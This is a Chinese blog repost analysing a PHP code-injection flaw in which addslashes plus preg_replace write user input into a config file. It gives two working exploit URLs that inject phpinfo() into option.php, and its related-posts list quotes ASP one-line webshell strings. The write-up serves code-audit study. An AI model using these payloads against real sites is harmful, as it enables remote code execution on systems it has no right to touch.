PHP正则配合写配置文件导致Getshell

最新推荐文章于 2023-07-11 23:27:18 发布
最新推荐文章于 2023-07-11 23:27:18 发布
阅读量355 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/Oran9e/p/8082842.html
版权

PHP正则配合写配置文件导致Getshell,偶然间看到的一个题目, p 牛的小密圈的一个问题。

分析一下,漏洞代码:

index.php

<?php
$str=addslashes($_GET['option']);
$file=file_get_contents('option.php');
$file=preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
echo $file;
file_put_contents('option.php', $file);
?>

 

option.php

<?php
$option='123';
?>

 

现在来分析一下代码:

  1. 对传入的 option 参数进行 addslashes ,比如有单引号 ',会变成\'
  2. 通过正则匹配 option.php 中的 $option='123';,将123的内容替换为经第一步处理的值。
  3. 替换完成,将其写入 option.php。

场景:写入配置文件。

 

方法一(利用正则的.*、单引号):

先访问:

http://127.0.0.1/test/index.php?option=123';%0aphpinfo();//

经过 addslashes 后,$str 值为 123\';%0aphpinfo();//

进行正则匹配并写入文件,option.php 的内容变为:

<?php
$option='123\';
phpinfo();//';
?>

 

再访问:

http://127.0.0.1/test/index.php?option=123

正则匹配时,会将两个单引号里的内容即 123\ ,替换为 123,此时 option.php 的内容变为

<?php
$option='123';
phpinfo();//';
?>

 

最后访问:http://127.0.0.1/test/option.php

成功 Getshell

 

 

方法二(利用preg_replace的转义):

访问:

http://127.0.0.1/test/index.php?option=123\';phpinfo();//

 

经过 addslashes 后,$str 为 123\\\';phpinfo();//

虽然 addslashes 将\转义为\\但是经过preg_replace正则匹配处理后\\又变为了\ ,三个\\\变成了两个\\

所以最后写入文件option.php 的内容变为:

<?php
$option='123\\';phpinfo();//';
?>

 

访问:http://127.0.0.1/test/option.php

成功 Getshell

 

 

 

原文链接:http://www.cnblogs.com/iamstudy/articles/config_file_write_vue.html

任重而道远!

转载于:https://www.cnblogs.com/Oran9e/p/8082842.html

weixin_30888707
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP使用则动态修改配置文件
06-06
总结一下,本文主要介绍了如何利用PHP的`file_get_contents()`、`preg_replace()`和`file_put_contents()`函数,配合则表达式来动态修改配置文件。这种技术在维护和部署过程中能够大大提升效率,同时避免了手动...
则截取文件名,文件后缀,文件路径
03-17
则截取文件名,文件后缀,文件父路径,去掉文件后缀 FileNameUtils.getParentPath : 获取父路径 如 C:\A\B\test.txt 返回: C:\A\B\ /home/usr/test.txt 返回 /home/usr/ FileNameUtils.getSuffix : 获取文件后缀...
php配置文件getshell,php_addslashes绕过与文件配置getshell
weixin_32829465的博客
03-17 173
绕过addslashes并文件配置getshell配置getshell与addslashes绕过:$str = addslashes($_GET['option']);$file = file_get_contents('xxxxx/option.php');$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $fi...
一个PHP则相关的“经典漏洞” preg_replace
3569
01-02 7447
https://www.cdxy.me/?p=756小密圈《代码审计》中看到P神发的“经典漏洞”,关于配置文件这个功能点。问题代码 $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|',"\$optio
其他常见的getshell方式
LJH1999ZN的博客
03-31 3652
ASP常用的一句话木马: <%eval request(“hack")%> <%execute request(“hack")%> <%execute(request(“hack"))%> <%ExecuteGlobal request(“hack")%> 一、修改配置文件getshell HadSky5.5.2.20180525存在配置文件导致getshell 安装过程总共五个步骤来进行安装,每一步程序将会引用一些文件进行操作,但是由于inst
PHP文件包含利用phpinfo入shell
qq_63489512的博客
07-11 875
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当php文件来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页应用的标准页眉或者菜单文件。当页眉需要更新时,只需更新一个包含文件就可以了。当遇到PHP文件包含漏洞时,如果找不到可以包含的文件,可以通过包含临时文件GetShell。由于临时文件文件名是随机的,如果目标网站存在phpinfo,则可以通过phpinfo来获取临时文件名,进而完成包含。
php配置文件getshell,配置文件入问题
weixin_39766867的博客
03-17 228
前言:最近开始学习代码审计,因为某种原因,容易健忘,所以,打算记录在简书,一点点的去记录自己在审计复现的日常,很多审计get到的姿势,都是在P神的小蜜圈里,还是挺爽的,在里面的每一个评论都可以让你少走弯路,所以,先在这里说明下来源出处。配置文件getshell一个经典的问题,很多getshell,都是在后台中,闭合+注释的方式,入自己的shelleg:$website='';//我们入:a';...
linux shell 路径截取则表达式
01-10
最近脚本,需要对脚本中函数传递的路径参数进行截取,发现了以下比较好用的方法,记录下: file=/dir1/dir2/dir3/my.file.txt 我们可以用${ }分别替换获得不同的值: ${file#*/}:拿掉第一条/及其左边的字串:...
shell模糊匹配与则详解
01-20
在IT领域,尤其是在Linux系统管理和自动化脚本编中,Shell模糊匹配和则表达式是不可或缺的工具。则表达式是一种强大的文本处理工具,它能够通过特定的语法模式匹配和处理字符串。本文将深入探讨这两种技术的...
shell则表达式.zip
01-15
在这个名为"shell则表达式.zip"的压缩包中,包含了一个名为"则表达式.jpg"的文件,推测这可能是一张图片,用于可视化地展示了一些常见的Shell则表达式用法。 Shell则表达式是基于Bash或其他Unix/Linux ...
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
php配置文件getshell,MIPCMS V3.1.0 远程配置文件Getshell过程分析(附批量getshell脚本)...
weixin_36073959的博客
03-17 526
0x01 前言看下整体的结构,用的是thinkPHP的架构,看到了install这个文件没有可以绕过install.lock进行重装,但是里面有一个一定要验证数据库,又要找一个SQL的注入漏洞。想起前几天大表哥Bypass发了一篇好像是关于mipcms的漏洞,赶紧去翻了一下,又学到不少技巧,这个技巧可以用在我上次发的一篇ZZCMS 8.2任意文件删除至Getshell的文章,里面有有个getshe...
phpshell,如何利用PHPShell
weixin_42134097的博客
03-09 726
Shell是什么?熟悉Linux的人应该都知道,Shell是一种脚本程序,底层应该是用C语言的。我们其实是仿造的Shell的实现。怎么可以用PHP呢?实际上要说的是用PHP如何实现一组控制台程序。控制台程序应该明白了吧!就是典型的黑白屏程序。第一步要解决执行问题:我们可以成.php文件,然后调用php xxx.php就可以执行了。这个决定与你的PHP在编译的时候支持CLI。当然这个也是篇文...
【代码审计】PHP配置文件getshell
Fly_鹏程万里
12-17 721
看到小密圈的一个关于配置文件入的题目,做一下记录。 问题代码: 1.php的内容如下: config.php的内容如下: preg_replace — 执行一个则表达式的搜索和替换 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int...
php_addslashes绕过与文件配置getshell
awanawan的博客
09-23 1048
绕过addslashes并文件配置getshellis_numeric函数 配置getshell与addslashes绕过: <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|'...
小密圈专题(1)-配置文件入问题
dengzhasong7076的博客
02-24 301
p师傅的小密圈的一个问题 <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file); file_put_contents('...
php配置文件getshell,代码审计之配置文件导致Getshell实例分析
weixin_29322855的博客
03-17 165
原标题:代码审计之配置文件导致Getshell实例分析*本文原创作者:davichi8282,本文属FreeBuf原创奖励计划,未经许可禁止转载0×00概述近期审计HadSky5.5.2.20180525最新版的时候发现配置文件导致的代码执行问题,刚开始审计的时候发现这套cms功能点真的很少,而且使用框架过滤的方式,传统注入xss问题很难发现,还有以往在审计cms安装时候是否存在配置文件任...
PHP则经典漏洞
weixin_30819085的博客
03-01 172
@author: Dlive P牛在小密圈中发的一个有关使用PHP配合配置文件导致Getshell的经典漏洞 漏洞代码是这样的: <?php //ph.php $str = addslashes($_GET['option']); $file = file_get_contents('option.php'); $file = preg_replace('|\$option=\'.*\...
mavan 则表达式打包配置文件
最新发布
07-27
如果您想对Maven项目中的配置文件进行打包,您可以使用Maven插件来实现则表达式的打包配置。具体步骤如下: 1. 在您的Maven项目的pom.xml文件中,添加以下插件配置: ```xml <groupId>org.apache.maven....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值